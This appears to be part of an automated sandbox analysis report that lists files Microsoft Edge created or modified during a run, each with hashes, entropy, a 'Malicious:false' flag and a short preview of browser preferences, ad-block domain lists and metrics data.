                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5ae71512-bf41-4ca1-a466-7189a3c9c065.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):60329
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.101941255180908
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:wMk1rT8HA4bKVCBS2qX7bjr8aPz3oWgorQXdbil:wMYrT8geKVkS20/FoXdbu
                                                                                                                                                                                                                                                                                          MD5:6AB1B20307F7071BE8D4BDA26AB114A8
                                                                                                                                                                                                                                                                                          SHA1:5F7E2A780544F39965A2EF1149DBC85F8B5678E3
                                                                                                                                                                                                                                                                                          SHA-256:2D77C97F44F3B8BBBDF80C0036F162C97ADC21AC62A7D4372D5FC3545BA8CF03
                                                                                                                                                                                                                                                                                          SHA-512:C3AD25571B59583F370A234E772CC82383AB0D55019CF0AF458F95100C192A3B193645384A0034FA5C7910FC1AF26569559A3B7A499BE6252E2B0E8B34A1A8B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"3bb1df32-2538-414d-87e9-5dc77ba17dce"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735570534"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\689bbe8f-24fb-4c02-a164-e70234afc263.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):58896
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.104739523068133
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynKKKCBS2qX7bHwgorQXdbiR3oM:z/0+zI7ynKKKkS205Xdbe3
                                                                                                                                                                                                                                                                                          MD5:805422E4FC678172B04692C7FD5E673E
                                                                                                                                                                                                                                                                                          SHA1:9553BFD89B716539600D66E66D24DCC2BC0DC455
                                                                                                                                                                                                                                                                                          SHA-256:93AF3FC40EBE4E9C936E43E3C16BA5D794AE02F769260920E69E7B30B7F65EE9
                                                                                                                                                                                                                                                                                          SHA-512:3670DA91F7047E949C6CE8E6B50636889CDD4C79F351E0CE4BD8452138DE6947893DF1FF46B3AC1BA0AB5DD5456818C7F97A8096BC66A62A51A1826D3B0A35CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\7b725cae-fbdf-490f-a809-764825257707.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                          MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                          SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                          SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                          SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                          MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                          SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                          SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                          SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6772B460-1D38.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.04757964259833776
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:UU9m0m5tmgnOAWJVSJ/EdxeQB0JVFg8XdHIuhEHZBzhEhNGMv+RQ8Tfgg4n8y08s:Pm0Utb/96Kohcxmvgg408T2RGOD
                                                                                                                                                                                                                                                                                          MD5:DF09AB081741FBA9E6A291F8D5500961
                                                                                                                                                                                                                                                                                          SHA1:218F29C7228E752F853E0CF081705C4806E35DBF
                                                                                                                                                                                                                                                                                          SHA-256:EFBDE6E16216B804900CC667197E0D69532FE5548D98C7B25426C3A44F9ABE44
                                                                                                                                                                                                                                                                                          SHA-512:01599A5396DEAFE42E788D54CA2C5C52B7146417D46A8C0A48DA55D7E384F7BAAFF4267F56624A7075B4A96EC09B1F0F2D3EC315A0519145C4DE0945B0CB282D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xslxph20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U..G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6...... .2............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6772B460-910.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5002634367661225
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:5vkfhN576d0WNXCEYlCdNi39Rc98OQE06wXVFqEB7rtr/JQrLwog1HF:6fhmgEYleNi3sO2wlFqEJtr/JQrLlaH
                                                                                                                                                                                                                                                                                          MD5:CDB68FE89314C5686CDD11A57B35BB7B
                                                                                                                                                                                                                                                                                          SHA1:059462AAB6829694949A3E8F61929CE35E86EA33
                                                                                                                                                                                                                                                                                          SHA-256:8D3346233A90DE3BD37F8566843E891FB4E22B7328859B56FB700BDC5A58C76B
                                                                                                                                                                                                                                                                                          SHA-512:28B475A711AA839821761A0BE74CDEB0F5626B9829FE5268C4A32C692BB0D58A3758CDBFA8B7948FBCBC5CB9DAD0CD1CEBA6C001606EE1FA65BED7DE542401D9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@...............p...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xslxph20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............%..................-...w..U?:K...G...W6.>.........."....."...24.."."93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....Mb.XiP@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......y...... .2........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1326399824826066
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlT0EiCjG2xo6kMWPGdV8B+BVP/Sh/JzvXEAAG34tTAUFVHTtOllt:o1AGGwwMWj+BVsJDkG3V80/
                                                                                                                                                                                                                                                                                          MD5:DB0B5F32DD6A247AE52AF2E9280D22D6
                                                                                                                                                                                                                                                                                          SHA1:DF845EBCFC1E637F3A8674D6F24D1206637C358A
                                                                                                                                                                                                                                                                                          SHA-256:20F50A96662CC19C9EA2D5C00F8FEECC0FFBD4B6290102C46CB7BB8B1B9CBFAE
                                                                                                                                                                                                                                                                                          SHA-512:87962BBB3C6F8B5AE66B669B2B24C772E7CBA73C9AF57F57BF05657B5FDADB53B6DDD84914D4C465241591B26F07C61E358AC77A5E35281AE0EBFA13FA2EF14D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:sdPC.......................c.CsJ......5"93dRcxCw0cDlBQeAYE33nFACeirrSGEv1FXdrR8ueYg="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................e9a6470b-82e9-4451-b995-4e1980b580b6............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\06647bf8-9cf5-4930-bbb7-571a882a7cfd.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):30243
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.565746121532621
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:cO/yh67pLGLhzyWPjPfg38F1+UoAYDCx9Tuqh0VfUC9xbog/OVAme4QDErwDipi2:cO/yhSchzyWPjPfg3u1jaBmerDdLt4
                                                                                                                                                                                                                                                                                          MD5:D88C1886A35732E31E70DF466202AD7D
                                                                                                                                                                                                                                                                                          SHA1:70A09737F7C9A52EF253049BB6080C8102847522
                                                                                                                                                                                                                                                                                          SHA-256:C28A8E3C552C259D506E225AC6362EA59417C703B4FB35F7FD8F9DABCDD1ABDE
                                                                                                                                                                                                                                                                                          SHA-512:026BF7C5C0F55C7586B1D2F78D61EFA991A078FB543F7A1A46048B44A83E834FD9E798533B7FFA70D19AA432FDF3F0303BF1CFA1C1D9D6126C81A625A1EBDF11
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380044129103691","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380044129103691","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1cceea7e-8314-44c3-967c-9e2a7c1273e9.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17725), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17726
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.483795113317979
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8J99QTryDigabatSuypFscTIJZn4kcSoiA1jC31/8hlUKuV85UbV+F1olQw3Gl:st8PGKSu4FscTiZnGe3yRUbG1CQwWl
                                                                                                                                                                                                                                                                                          MD5:53C7F2C3C13546175C8267F5719A4FCA
                                                                                                                                                                                                                                                                                          SHA1:378D9C9B055626403A13528745A6B81573C9CD3F
                                                                                                                                                                                                                                                                                          SHA-256:0C1D0456852F68314713FED7FB8597E17D0C7CEAF540DA0559E0802931B08505
                                                                                                                                                                                                                                                                                          SHA-512:2AB62E6AE30F2A931E405F6CC3E5D44FAD6308FF53E1EFC6FB8D71DEE9A8DC6DCD24D5CE6F86A01A3CF89E1069C7AA0BE7E0629DF7B8E87086288FF0A307123A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4d0417ca-a020-4648-8974-314b7c2581f3.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\50e081c7-3498-4925-9653-a991d330572d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7183d99e-86a3-48c1-af7c-c07770367939.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17559), with no line terminators
